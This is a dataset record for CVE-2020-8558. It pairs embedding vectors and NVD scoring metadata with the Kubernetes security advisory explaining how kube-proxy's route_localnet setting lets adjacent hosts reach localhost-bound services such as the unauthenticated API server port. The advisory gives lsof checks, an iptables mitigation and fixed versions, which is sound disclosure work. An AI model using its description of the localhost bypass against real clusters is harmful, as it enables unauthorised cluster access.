-0.025137729942798615, 0.010349028743803501, -0.036895208060741425, -0.015270941890776157, -0.0027652268763631582, 0.01390076708048582, 0.01326543465256691, 0.03043471835553646, 0.010027535259723663, -0.003769894130527973, -0.004887466784566641, -0.02222898043692112, 0.008994163945317268, -0.00443584518507123, -0.03211873397231102, 0.004780302289873362, 0.011275236494839191, 0.012308608740568161, 0.004114351235330105, 0.05734831839799881, 0.010318410582840443, 0.011397710070014, 0.003264690050855279, -0.0017816098406910896, 0.0061083766631782055, -0.014069167897105217, -0.014811664819717407, 0.006357151549309492, 0.007432623766362667, 0.001218039426021278, -0.0058175018057227135, 0.013135306537151337, -0.008389449678361416, 0.008159811608493328, -0.0048951213248074055, -0.011137453839182854, -0.003559392411261797, -0.02484685555100441, 0.009407512843608856, -0.0009706998826004565, -0.005480698775500059, 0.009920370765030384, -0.02671458013355732, 0.009162564761936665, 0.005607000086456537, -0.0024169422686100006, -0.0036416794173419476, -0.008289939723908901, -0.04252899810671806, 0.00923145655542612, -0.017835235223174095, -0.008014373481273651, 0.02262702025473118, 0.02467845380306244, 0.007539788261055946, -0.008511923253536224, 0.017483122646808624, 0.0001422082568751648, -0.01165796723216772, -0.012293299660086632, -0.008496614173054695, -0.003842612961307168, 0.00017318548634648323, -0.000613325391896069, -0.01901404559612274, -0.010119390673935413, -0.006659508217126131, -0.010846578516066074, -0.0188609529286623, -0.005993557628244162, 0.018570076674222946, -0.0004288972122594714, 0.021555373445153236, -0.0036665569059550762, -0.028153646737337112, 0.01811080053448677, 0.02000914327800274, -0.00785362720489502, -0.01250762864947319, -0.013410871848464012, -0.0237139742821455, -0.0058672563172876835, -0.010295446962118149, -0.012316263280808926, -0.006131340283900499, -0.00696569262072444, 0.008251667022705078, -0.029378382489085197, 0.020468419417738914, 0.009468749165534973, -0.006230850238353014, 0.002883873414248228, -0.0186772421002388, -0.018922189250588417, -0.007134093903005123, 0.02538267895579338, -0.007386696059256792, 0.011550802737474442, 0.01572256349027157, -0.003291481174528599, 0.0033737681806087494, -0.007983755320310593, -0.00024901394499465823, -0.006969519890844822, -0.01065521314740181, -0.01168858539313078, -0.0009037220734171569, -0.004680792335420847, 0.023453716188669205, 0.013135306537151337, 0.016028746962547302, -0.01644209586083889, -0.007631643675267696, 0.009973953478038311, -0.025275513529777527, 0.00858081504702568, 0.018064873293042183, 0.004255961626768112, 0.013701747171580791, -0.01130585465580225, 0.01869255118072033, -0.010831269435584545, -0.01364816538989544, 0.009797897189855576, -0.016748281195759773, -0.030909305438399315, -0.016962610185146332, 0.00039851799374446273, -0.003938295412808657, -0.003400559304282069, 0.01736065000295639, -0.023576190695166588, 0.011267581954598427, -0.0037622395902872086, -0.004967840388417244, 0.004830057267099619, 0.00812919344753027, 0.012576519511640072, 0.011328819207847118, -0.0021796494256705046, -0.00848895963281393, 0.008741561323404312, 0.005813674069941044, 0.004535354673862457, -0.019764196127653122, 0.009866788983345032, 0.01661049760878086, -0.003264690050855279, 0.009874443523585796, 0.00024877474061213434, -0.005538108292967081, -0.0022849002853035927, 0.011589075438678265, -0.0006099765305407345, 0.003532601287588477, -0.002910664537921548, -0.010211246088147163, 0.010877196677029133, -0.0036416794173419476, 0.0006951340474188328, 0.05361286923289299, -0.0013127651764079928, 0.004405226558446884, -0.008848725818097591, 0.002629357622936368, -0.019672341644763947, -0.002583429915830493, -0.006070103496313095, -0.03138389065861702, 0.010647558607161045, 0.010685832239687443, 0.032241206616163254, 0.001024760538712144, 0.013617546297609806, -0.01269133947789669, 0.0013577359495684505, 0.03254739195108414, -0.02446412481367588, -0.01589096523821354, -0.0021011896897107363, -0.008588469587266445, -0.011045598424971104, -0.0038005125243216753, 0.0006664292304776609, 0.0002185151242883876, 0.002392064779996872, 0.006227022968232632, 0.02036125585436821, 0.003247467102482915, -0.010892506688833237, 0.007432623766362667, -0.012010078877210617, -0.0016734885284677148, 0.00867267046123743, 0.021249189972877502, 0.005878738593310118, 0.007991409860551357, -0.0021949587389826775, 0.014972412027418613, 0.018968116492033005, -0.0021662539802491665, -0.022382071241736412, 0.0023097777739167213, 0.011252272874116898, -0.0013395563000813127, -0.014352388679981232, -0.005185996647924185, -0.0023691009264439344, 0.012538246810436249, 0.017421886324882507, -0.007260395213961601, 0.015446997247636318, -0.009116637520492077, -0.020208163186907768, 0.019580485299229622, -0.009300348348915577, -0.01214020699262619, 0.02109609730541706, -0.018003636971116066, 0.007298667915165424, -0.005377361550927162, -0.03066435642540455, 0.03787499666213989 ]
1,742
CVE-2020-8558
2020-07-27T20:15:12.413000
The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Such a service is generally thought to be reachable only by other processes on the same host, but due to this defeect, could be reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.5, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "jordan@liggitt.net", "type": "Secondary" } ] }
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/92315" }, { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-announce/c/sI4KmlH3S2I/m/TljjxOBvBQAJ" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200821-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "9586C74C-1239-4E96-89A6-F618D14EF889", "versionEndExcluding": null, "versionEndIncluding": "1.16.10", "versionStartExcluding": null, "versionStartIncluding": "1.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "F7D0C82A-F13C-4D41-854D-51234D20873E", "versionEndExcluding": null, "versionEndIncluding": "1.17.6", "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FDA694A4-8EC3-47E1-A1F3-CF083D894371", "versionEndExcluding": null, "versionEndIncluding": "1.18.3", "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/92315
[ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: In typical clusters: medium (5.4) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) In clusters where API server insecure port has not been disabled: high (8.8) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) A security issue was discovered in `kube-proxy` which allows adjacent hosts to reach TCP and UDP services bound to `127.0.0.1` running on the node or in the node's network namespace. For example, if a cluster administrator runs a TCP service on a node that listens on `127.0.0.1:1234`, because of this bug, that service would be potentially reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service. If the example service on port `1234` required no additional authentication (because it assumed that only other localhost processes could reach it), then it could be vulnerable to attacks that make use of this bug. The Kubernetes API Server's default insecure port setting causes the API server to listen on `127.0.0.1:8080` where it will accept requests without authentication. Many Kubernetes installers explicitly disable the API Server's insecure port, but in clusters where it is not disabled, an attacker with access to another system on the same LAN or with control of a container running on the master may be able to reach the API server and execute arbitrary API requests on the cluster. This port is deprecated, and will be removed in Kubernetes v1.20. ### Am I vulnerable? You may be vulnerable if: - You are running a vulnerable version (see below) - Your cluster nodes run in an environment where untrusted hosts share the same layer 2 domain (i.e. same LAN) as nodes - Your cluster allows untrusted pods to run containers with `CAP_NET_RAW` (the Kubernetes default is to allow this capability). - Your nodes (or hostnetwork pods) run any localhost-only services which do not require any further authentication. To list services that are potentially affected, run the following commands on nodes:    - `lsof +c 15 -P -n -i4TCP@127.0.0.1 -sTCP:LISTEN`   - `lsof +c 15 -P -n -i4UDP@127.0.0.1` On a master node, an lsof entry like this indicates that the API server may be listening with an insecure port: ``` COMMAND        PID  USER FD   TYPE DEVICE SIZE/OFF NODE NAME kube-apiserver 123  root  7u  IPv4  26799      0t0  TCP 127.0.0.1:8080 (LISTEN) ``` #### Affected Versions - kubelet/kube-proxy v1.18.0-1.18.3 - kubelet/kube-proxy v1.17.0-1.17.6 - kubelet/kube-proxy <=1.16.10 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by manually adding an iptables rule on nodes. This rule will reject traffic to 127.0.0.1 which does not originate on the node. ` iptables -I INPUT --dst 127.0.0.0/8 ! --src 127.0.0.0/8 -m conntrack ! --ctstate RELATED,ESTABLISHED,DNAT -j DROP` Additionally, if your cluster does not already have the API Server insecure port disabled, we strongly suggest that you disable it. Add the following flag to your kubernetes API server command line: `--insecure-port=0` #### Detection Packets on the wire with an IPv4 destination in the range 127.0.0.0/8 and a layer-2 destination MAC address of a node may indicate that an attack is targeting this vulnerability. #### Fixed Versions Although the issue is caused by `kube-proxy`, the current fix for the issue is in `kubelet` (although future versions may have the fix in `kube-proxy` instead). We recommend updating both `kubelet` and `kube-proxy` to be sure the issue is addressed. The following versions contain the fix: - kubelet/kube-proxy master - fixed by #91569 - kubelet/kube-proxy v1.18.4+ - fixed by #92038 - kubelet/kube-proxy v1.17.7+ - fixed by #92039 - kubelet/kube-proxy v1.16.11+ - fixed by #92040 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ## Additional Details This issue was originally raised in issue #90259 which details how the `kube-proxy` sets `net.ipv4.conf.all.route_localnet=1` which causes the system not to reject traffic to localhost which originates on other hosts. IPv6-only services that bind to a `localhost` address are not affected.  There may be additional attack vectors possible in addition to those fixed by #91569 and its cherry-picks. For those attacks to succeed, the target service would need to be UDP and the attack could only rely upon sending UDP datagrams since it wouldn't receive any replies. Finally, the target node would need to have reverse-path filtering disabled for an attack to have any effect. Work is ongoing to determine whether and how this issue should be fixed. See #91666 for up-to-date status on this issue.   #### Acknowledgements This vulnerability was reported by János Kövér, Ericsson with additional impacts reported by Rory McCune, NCC Group and Yuval Avrahami and Ariel Zelivansky, Palo Alto Networks. /area security /kind bug /committee product-security /sig network /sig node /area kubelet
CVE-2020-8558: Node setting allows for neighboring hosts to bypass localhost boundary
https://api.github.com/repos/kubernetes/kubernetes/issues/92315/comments
17
2020-06-19T18:38:58
2021-12-02T22:54:39Z
https://github.com/kubernetes/kubernetes/issues/92315
642,156,921
92,315
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2020-8558: Node setting allows for neighboring hosts to bypass localhost boundary Issue date: --- start body --- CVSS Rating: In typical clusters: medium (5.4) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) In clusters where API server insecure port has not been disabled: high (8.8) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) A security issue was discovered in `kube-proxy` which allows adjacent hosts to reach TCP and UDP services bound to `127.0.0.1` running on the node or in the node's network namespace. For example, if a cluster administrator runs a TCP service on a node that listens on `127.0.0.1:1234`, because of this bug, that service would be potentially reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service. If the example service on port `1234` required no additional authentication (because it assumed that only other localhost processes could reach it), then it could be vulnerable to attacks that make use of this bug. The Kubernetes API Server's default insecure port setting causes the API server to listen on `127.0.0.1:8080` where it will accept requests without authentication. Many Kubernetes installers explicitly disable the API Server's insecure port, but in clusters where it is not disabled, an attacker with access to another system on the same LAN or with control of a container running on the master may be able to reach the API server and execute arbitrary API requests on the cluster. This port is deprecated, and will be removed in Kubernetes v1.20. ### Am I vulnerable? You may be vulnerable if: - You are running a vulnerable version (see below) - Your cluster nodes run in an environment where untrusted hosts share the same layer 2 domain (i.e. same LAN) as nodes - Your cluster allows untrusted pods to run containers with `CAP_NET_RAW` (the Kubernetes default is to allow this capability). - Your nodes (or hostnetwork pods) run any localhost-only services which do not require any further authentication. To list services that are potentially affected, run the following commands on nodes:    - `lsof +c 15 -P -n -i4TCP@127.0.0.1 -sTCP:LISTEN`   - `lsof +c 15 -P -n -i4UDP@127.0.0.1` On a master node, an lsof entry like this indicates that the API server may be listening with an insecure port: ``` COMMAND        PID  USER FD   TYPE DEVICE SIZE/OFF NODE NAME kube-apiserver 123  root  7u  IPv4  26799      0t0  TCP 127.0.0.1:8080 (LISTEN) ``` #### Affected Versions - kubelet/kube-proxy v1.18.0-1.18.3 - kubelet/kube-proxy v1.17.0-1.17.6 - kubelet/kube-proxy <=1.16.10 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by manually adding an iptables rule on nodes. This rule will reject traffic to 127.0.0.1 which does not originate on the node. ` iptables -I INPUT --dst 127.0.0.0/8 ! --src 127.0.0.0/8 -m conntrack ! --ctstate RELATED,ESTABLISHED,DNAT -j DROP` Additionally, if your cluster does not already have the API Server insecure port disabled, we strongly suggest that you disable it. Add the following flag to your kubernetes API server command line: `--insecure-port=0` #### Detection Packets on the wire with an IPv4 destination in the range 127.0.0.0/8 and a layer-2 destination MAC address of a node may indicate that an attack is targeting this vulnerability. #### Fixed Versions Although the issue is caused by `kube-proxy`, the current fix for the issue is in `kubelet` (although future versions may have the fix in `kube-proxy` instead). We recommend updating both `kubelet` and `kube-proxy` to be sure the issue is addressed. The following versions contain the fix: - kubelet/kube-proxy master - fixed by #91569 - kubelet/kube-proxy v1.18.4+ - fixed by #92038 - kubelet/kube-proxy v1.17.7+ - fixed by #92039 - kubelet/kube-proxy v1.16.11+ - fixed by #92040 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ## Additional Details This issue was originally raised in issue #90259 which details how the `kube-proxy` sets `net.ipv4.conf.all.route_localnet=1` which causes the system not to reject traffic to localhost which originates on other hosts. IPv6-only services that bind to a `localhost` address are not affected.  There may be additional attack vectors possible in addition to those fixed by #91569 and its cherry-picks. For those attacks to succeed, the target service would need to be UDP and the attack could only rely upon sending UDP datagrams since it wouldn't receive any replies. Finally, the target node would need to have reverse-path filtering disabled for an attack to have any effect. Work is ongoing to determine whether and how this issue should be fixed. See #91666 for up-to-date status on this issue.   #### Acknowledgements This vulnerability was reported by János Kövér, Ericsson with additional impacts reported by Rory McCune, NCC Group and Yuval Avrahami and Ariel Zelivansky, Palo Alto Networks. /area security /kind bug /committee product-security /sig network /sig node /area kubelet --- end body ---
5,437
[ -0.04358570650219917, -0.016207683831453323, -0.00494381133466959, 0.01854597218334675, 0.011043405160307884, -0.02580134943127632, -0.007910097949206829, 0.02928874082863331, -0.008878817781805992, -0.013922841288149357, -0.035568717867136, -0.01169812586158514, -0.005444873124361038, 0.003094892483204603, 0.02636253833770752, 0.04727352410554886, -0.0225811917334795, -0.014644370414316654, -0.010321876034140587, 0.02741810865700245, 0.0034840507432818413, -0.0035007528495043516, -0.04382621869444847, 0.046525269746780396, 0.00909260381013155, 0.01989549957215786, 0.00620648730546236, 0.026723302900791168, -0.020149370655417442, 0.021458812057971954, 0.025694455951452255, 0.006400231271982193, 0.003754624165594578, 0.014684455469250679, 0.03840138763189316, 0.012620080262422562, 0.01651500165462494, 0.04305124282836914, -0.01965498924255371, -0.030411118641495705, -0.04126077890396118, -0.04770109802484512, -0.009687197394669056, 0.013622203841805458, -0.008852094411849976, 0.015499516390264034, -0.007395674008876085, -0.035809226334095, -0.022808339446783066, 0.009059200063347816, -0.0006509629893116653, -0.03035767190158367, -0.022688085213303566, -0.0624256357550621, -0.001093985280022025, -0.023529868572950363, 0.013248077593743801, 0.018733035773038864, 0.0041988990269601345, -0.010969916358590126, 0.019227417185902596, 0.020683836191892624, 0.01141085010021925, 0.00923290103673935, -0.002600511536002159, 0.054622430354356766, -0.010989958420395851, 0.0018255356699228287, -0.031052477657794952, -0.008918902836740017, -0.004733365029096603, 0.007562695071101189, 0.034686848521232605, -0.0027458195108920336, 0.05350005254149437, -0.02315574325621128, 0.029101677238941193, 0.04425378888845444, -0.032575707882642746, 0.017543848603963852, -0.007642864715307951, 0.02160579152405262, -0.01664861850440502, 0.04382621869444847, 0.04219609498977661, 0.009192815981805325, -0.008778605610132217, -0.07300806790590286, 0.01579347252845764, -0.015606408938765526, -0.007041590288281441, 0.008264181204140186, -0.0091727739199996, -0.016528362408280373, 0.026589686051011086, -0.010321876034140587, -0.001838897354900837, -0.02741810865700245, -0.047460585832595825, 0.028914613649249077, -0.028540488332509995, -0.021044600754976273, -0.009453368373215199, 0.020069200545549393, 0.05251128971576691, 0.00876524392515421, -0.012212549336254597, 0.006510464940220118, -0.009339794516563416, 0.12111000716686249, 0.029555972665548325, -0.012012124992907047, -0.035568717867136, -0.00966047402471304, -0.02942235767841339, 0.033511023968458176, -0.005057385191321373, 0.012700250372290611, -0.06344112008810043, -0.005902509670704603, -0.0028209786396473646, -0.006049487739801407, 0.012232592329382896, -0.02405097335577011, -0.05472932383418083, 0.02266136184334755, 0.012172464281320572, 0.02262127585709095, -0.06691515445709229, -0.01320131216198206, 0.009453368373215199, 0.013448502868413925, -0.019093800336122513, -0.027391385287046432, -0.0026472772005945444, 0.015846919268369675, 0.016140874475240707, 0.05350005254149437, -0.001882322714664042, -0.003423923160880804, 0.005287873558700085, -0.010929831303656101, -0.0222605112940073, 0.0021144812926650047, -0.0055116815492510796, 0.010074685327708721, 0.02713751420378685, -0.016261130571365356, -0.01737014763057232, -0.003011382184922695, -0.002181289717555046, -0.016247767955064774, 0.043639153242111206, 0.04222282022237778, 0.07744413614273071, -0.02958269603550434, 0.005164278205484152, 0.018773119896650314, 0.0038114110939204693, 0.0019591522868722677, -0.003975091502070427, -0.05184320732951164, -0.014230159111320972, -0.039363425225019455, 0.017583932727575302, 0.02522679790854454, 0.01940111815929413, 0.007368951104581356, -0.04361243173480034, 0.02278161607682705, 0.013615523464977741, -0.025600925087928772, 0.03420582786202431, 0.0031232861801981926, -0.04085993021726608, -0.015259006060659885, -0.00028414386906661093, 0.02433156780898571, 0.029609419405460358, 0.00030710920691490173, -0.016341300681233406, 0.016702065244317055, -0.03981772065162659, 0.020523497834801674, 0.0008188186911866069, -0.028593935072422028, -0.019882136955857277, -0.010134812444448471, 0.016568448394536972, -0.010141493752598763, -0.004616450518369675, -0.010041281580924988, 0.005935913883149624, -0.03511442244052887, -0.05879126861691475, 0.00338216801173985, -0.004589727148413658, -0.01941448077559471, 0.06723583489656448, -0.025988413020968437, 0.01218582596629858, 0.021632514894008636, -0.03543509915471077, -0.004552982747554779, -0.007141802925616503, 0.008498010225594044, 0.0007716353866271675, -0.013949564658105373, 0.024438461288809776, -0.037813473492860794, -0.01753048785030842, -0.030785245820879936, 0.014283605851233006, 0.005047363694757223, 0.019641628488898277, -0.0007294626557268202, 0.010268429294228554, 0.020563581958413124, -0.03914963826537132, 0.015178835950791836, 0.03433944657444954, -0.02848704159259796, -0.0006259098881855607, 0.014190074056386948, -0.0457235723733902, 0.01072272565215826, 0.021138133481144905, -0.05328626558184624, 0.007676268927752972, -0.02843359485268593, -0.009620388969779015, -0.019628265872597694, -0.006109615322202444, 0.021098047494888306, -0.018773119896650314, -0.012673527002334595, -0.00881200935691595, 0.0265362411737442, 0.02417122758924961, 0.003674454288557172, 0.00009071308886632323, 0.00992770679295063, -0.031667113304138184, -0.008270862512290478, -0.0018038229318335652, 0.01487151812762022, -0.03431272134184837, 0.038588449358940125, -0.023690208792686462, 0.004699960816651583, -0.047754544764757156, 0.036049734801054, 0.0013478565961122513, -0.020109286531805992, -0.022701445966959, -0.049170877784490585, -0.014577561989426613, -0.0011958677787333727, 0.035782504826784134, 0.015165474265813828, 0.04019184783101082, 0.008304266259074211, -0.009486773051321507, 0.027979299426078796, 0.01475126389414072, -0.037572965025901794, -0.013869394548237324, 0.01684904284775257, 0.01671542599797249, -0.02413114346563816, -0.004873662255704403, -0.03377825394272804, 0.002348310314118862, -0.007074994500726461, -0.01275369618088007, -0.008184012025594711, 0.018612781539559364, 0.03364463895559311, 0.0010672619100660086, -0.022688085213303566, 0.01680895872414112, -0.023997526615858078, -0.009613708592951298, 0.012279357761144638, -0.020082563161849976, -0.0027291174046695232, -0.004877002909779549, -0.04222282022237778, -0.004723343998193741, 0.0017687486251816154, -0.028219807893037796, -0.013301524333655834, 0.000276210397714749, 0.011110213585197926, 0.012259315699338913, 0.016327938064932823, -0.00868507381528616, 0.039042744785547256, -0.02982320636510849, -0.011584552004933357, -0.01381594780832529, -0.01989549957215786, 0.0270573440939188, 0.009921026416122913, -0.030250780284404755, 0.004325834568589926, -0.010408726520836353, 0.05160269886255264, -0.016742149367928505, -0.00035867682890966535, 0.00880532804876566, -0.04903726279735565, -0.004118728917092085, -0.028086191043257713, 0.017637379467487335, 0.007001505699008703, 0.001665195799432695, -0.03246881440281868, 0.0007478349143639207, 0.013234715908765793, 0.02132519520819187, -0.00966715533286333, -0.018612781539559364, 0.03813415393233299, -0.0007399014430120587, -0.03294983133673668, 0.010188259184360504, 0.02371693216264248, -0.04222282022237778, -0.020122647285461426, -0.004305792041122913, 0.012012124992907047, -0.047380417585372925, -0.031052477657794952, -0.011825061403214931, -0.02009592391550541, -0.023783739656209946, 0.032575707882642746, 0.049251049757003784, 0.008424521423876286, -0.01100332010537386, -0.027043983340263367, 0.0036009650211781263, 0.01078285276889801, 0.009880941361188889, -0.022875146940350533, -0.009186135604977608, -0.019307587295770645, 0.038027260452508926, -0.008618265390396118, 0.0009703899268060923, 0.03490063548088074, -0.005157597362995148, 0.019801968708634377, 0.040672868490219116, -0.007101717870682478, -0.023690208792686462, -0.01417671237140894, 0.01228603906929493, -0.031239541247487068, 0.06606000661849976, -0.059379179030656815, -0.0024418418761342764, 0.059058498591184616, -0.01770418882369995, -0.001626781071536243, -0.0267767496407032, -0.026228921487927437, -0.009820814244449139, -0.004182197153568268, -0.07140466570854187, 0.0039049426559358835, 0.0039016022346913815, 0.02912840060889721, -0.01346854493021965, -0.017316700890660286, -0.030892139300704002, 0.02136528119444847, -0.032121412456035614, 0.02047005109488964, -0.04019184783101082, 0.01981532946228981, 0.031025754287838936, -0.02779223583638668, 0.018372271209955215, 0.04366587847471237, 0.021779492497444153, 0.029769759625196457, 0.02047005109488964, 0.024425098672509193, -0.05082772299647331, 0.06659447401762009, -0.03404548764228821, -0.03083869256079197, -0.020269624888896942, 0.010361961089074612, -0.024304844439029694, -0.029849929735064507, 0.02843359485268593, -0.007963544689118862, 0.01692921295762062, 0.02880772016942501, -0.011197064071893692, 0.01989549957215786, -0.009573623538017273, 0.01100332010537386, -0.02136528119444847, -0.05895160883665085, -0.008297585882246494, -0.057348210364580154, 0.0110701285302639, -0.007388993166387081, -0.034686848521232605, 0.0031683817505836487, 0.02896806038916111, 0.09609699994325638, 0.05264490842819214, -0.013789224438369274, 0.008785285986959934, 0.022714808583259583, 0.027925852686166763, -0.010589108802378178, 0.02608194388449192, 0.024077696725726128, 0.007943501695990562, 0.013007568195462227, 0.03324379026889801, 0.04128750413656235, 0.027204323559999466, 0.002184630138799548, 0.00004149419328314252, -0.002543724374845624, 0.004369260277599096, 0.0035675610415637493, -0.013949564658105373, -0.009680517017841339, -0.00046724025742150843, -0.052431121468544006, -0.013722416013479233, -0.024745779111981392, -0.024892756715416908, -0.019026992842555046, -0.014711178839206696, 0.024665609002113342, -0.027551725506782532, -0.021057963371276855, -0.024972926825284958, -0.009860899299383163, -0.019548095762729645, -0.03300327807664871, -0.035568717867136, -0.0177442729473114, -0.013047653250396252, -0.020282987505197525, -0.030384395271539688, -0.004058601800352335, -0.016996020451188087, -0.04788815975189209, 0.04820884019136429, 0.020069200545549393, -0.0011440914822742343, 0.009613708592951298, -0.01101000141352415, 0.0034573273733258247, 0.004092006012797356, -0.02779223583638668, -0.013087737374007702, -0.05622582882642746, 0.01397628802806139, -0.028086191043257713, 0.045830465853214264, 0.023810463026165962, 0.0272577702999115, 0.008711797185242176, 0.000576638791244477, 0.032976556569337845, -0.007148483768105507, 0.005748850759118795, -0.007996948435902596, 0.03433944657444954, 0.0005094129592180252, 0.03711866959929466, 0.000329239439452067, -0.008290904574096203, -0.003988453187048435, -0.027738789096474648, -0.008411159738898277, 0.0013704043813049793, -0.024799225851893425, -0.04518910497426987, 0.06279975920915604, -0.009934388101100922, 0.014631008729338646, -0.04927777126431465, 0.015405984595417976, 0.0037279007956385612, 0.004275728482753038, -0.015165474265813828, 0.06066189706325531, 0.00966047402471304, 0.009533538483083248, -0.011818381026387215, 0.014644370414316654, -0.0003906195343006402, -0.00574551010504365, -0.016140874475240707, -0.006647421512752771, 0.04882347583770752, -0.001752046518959105, 0.005408128723502159, -0.011170340701937675, -0.006887931376695633, 0.008010310120880604, -0.007034909445792437, 0.007215291727334261, -0.020764006301760674, 0.030651628971099854, -0.035809226334095, -0.000133303357870318, 0.01397628802806139, -0.013775862753391266, -0.028540488332509995, 0.010121450759470463, 0.00577891431748867, -0.0032402004580944777, 0.005965977441519499, 0.022701445966959, -0.020563581958413124, -0.02331608161330223, -0.015846919268369675, 0.03115937113761902, -0.007656226400285959, -0.02888789027929306, 0.010682640597224236, 0.006841165479272604, 0.013909479603171349, -0.00560521287843585, -0.01676887273788452, -0.02025626413524151, -0.013114460743963718, -0.017116276547312737, 0.04321158304810524, -0.02107132412493229, -0.007983586750924587, -0.016167597845196724, 0.025560839101672173, -0.024318205192685127, 0.008798647671937943, 0.018706312403082848, -0.02363676205277443, 0.023944079875946045, 0.0000049812601901066955, 0.03153349831700325, 0.03014388680458069, -0.008965668268501759, -0.028006022796034813, 0.03845483437180519, 0.02067047543823719, 0.025600925087928772, -0.003019733354449272, -0.0006618193001486361, 0.006523826625198126, -0.017811082303524017, -0.03650403395295143, -0.015058581717312336, -0.025560839101672173, -0.03238864243030548, 0.004259026609361172, -0.029956823214888573, 0.0222605112940073, 0.02071055956184864, -0.0044594514183700085, 0.0036043054424226284, -0.017076190561056137, -0.0027942555025219917, 0.014029733836650848, -0.0009344805148430169, -0.018398994579911232, -0.010054643265902996, 0.008424521423876286, 0.005301235243678093, 0.008498010225594044, -0.014924964867532253, -0.009754005819559097, 0.017156360670924187, 0.01944120228290558, -0.0028927975799888372, 0.01043544989079237, 0.0007248696056194603, -0.019026992842555046, 0.0018739716615527868, 0.011871827766299248, 0.004422706551849842, -0.011631317436695099, 0.03714539110660553, -0.0015766748692840338, 0.012780419550836086, 0.010936511680483818, 0.015178835950791836, -0.00760946050286293, 0.004593067802488804, 0.007856651209294796, 0.020122647285461426, -0.022327320650219917, 0.0013411757536232471, 0.024959566071629524, -0.013455183245241642, 0.0440400056540966, -0.036878157407045364, 0.005825680214911699, -0.003096562810242176, -0.004486174322664738, 0.0222605112940073, -0.016007259488105774, 0.01965498924255371, -0.022073447704315186, 0.007636183872818947, -0.008364394307136536, 0.019013630226254463, 0.0020209497306495905, -0.0087518822401762, -0.010949873365461826, 0.0028193085454404354, -0.011470978148281574, 0.026790112257003784, -0.0068344846367836, 0.020336434245109558, -0.014764624647796154, -0.011871827766299248, 0.006807761732488871, -0.010896426625549793, -0.016982659697532654, 0.0007219467661343515, -0.027658618986606598, -0.03294983133673668, 0.006894612219184637, -0.02401088736951351, -0.005057385191321373, -0.016207683831453323, 0.0049838959239423275, -0.003375487169250846, 0.01515211258083582, -0.02030971087515354, 0.036316968500614166, -0.019267501309514046, 0.008892179466784, -0.04521583020687103, 